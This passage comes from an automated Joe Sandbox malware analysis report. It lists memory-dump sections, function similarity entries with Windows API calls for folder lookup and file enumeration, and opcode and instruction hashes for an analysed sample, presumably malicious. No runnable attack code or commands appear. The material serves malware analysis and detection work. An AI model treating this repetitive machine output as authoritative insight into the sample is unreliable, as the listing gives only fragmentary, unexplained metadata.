                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSize
                                        • String ID:
                                        • API String ID: 1378416451-0
                                        • Opcode ID: a7767e22fc7968f58a283133d432a6e7acf0cd31e54cda01b35080f3d1f6827b
                                        • Instruction ID: a5fcdf055f9a6325d074450794e9116230467aa246f1962276b417f33552e284
                                        • Opcode Fuzzy Hash: a7767e22fc7968f58a283133d432a6e7acf0cd31e54cda01b35080f3d1f6827b
                                        • Instruction Fuzzy Hash: C5F04F35E40308BBDF10DFB0EC59F9E77B9AB4C711F10C694B651A72C4DA749A018B40
                                        APIs
                                        • __getptd.LIBCMT ref: 0092C74E
                                          • Part of subcall function 0092BF9F: __amsg_exit.LIBCMT ref: 0092BFAF
                                        • __getptd.LIBCMT ref: 0092C765
                                        • __amsg_exit.LIBCMT ref: 0092C773
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0092C797
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 300741435-0
                                        • Opcode ID: 00b05925b9d52716c29ce3c0847594a29d99f302234c00bc3782fa61bc13627c
                                        • Instruction ID: 2b0960ba740b7bb46acd8b438f084508203093b3282552c26cb6b4703663d6ac
                                        • Opcode Fuzzy Hash: 00b05925b9d52716c29ce3c0847594a29d99f302234c00bc3782fa61bc13627c
                                        • Instruction Fuzzy Hash: 60F0BEB39047309BD721BBB8BC07B9E33E46F80720F214249F505F62DBCB685940AE96
                                        APIs
                                          • Part of subcall function 00928DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00928E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00924F7A
                                        • lstrcat.KERNEL32(?,00931070), ref: 00924F97
                                        • lstrcat.KERNEL32(?,006B9228), ref: 00924FAB
                                        • lstrcat.KERNEL32(?,00931074), ref: 00924FBD
                                          • Part of subcall function 00924910: wsprintfA.USER32 ref: 0092492C
                                          • Part of subcall function 00924910: FindFirstFileA.KERNEL32(?,?), ref: 00924943
                                          • Part of subcall function 00924910: StrCmpCA.SHLWAPI(?,00930FDC), ref: 00924971
                                          • Part of subcall function 00924910: StrCmpCA.SHLWAPI(?,00930FE0), ref: 00924987
                                          • Part of subcall function 00924910: FindNextFileA.KERNEL32(000000FF,?), ref: 00924B7D
                                          • Part of subcall function 00924910: FindClose.KERNEL32(000000FF), ref: 00924B92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                        • String ID:
                                        • API String ID: 2667927680-0
                                        • Opcode ID: 29ad4c81a56ffd6ef219d1e532731851d80b65dbcc691b4746b4547e8dffc191
                                        • Instruction ID: 47bc4c929d7c70b7fea9276d87625971ea1f8dded042f19f2dce2d863aae4f97
                                        • Opcode Fuzzy Hash: 29ad4c81a56ffd6ef219d1e532731851d80b65dbcc691b4746b4547e8dffc191
                                        • Instruction Fuzzy Hash: 2A21887A90031867C754F760FC46FEE333DABD4701F004694B659A3185EE75A6C88F92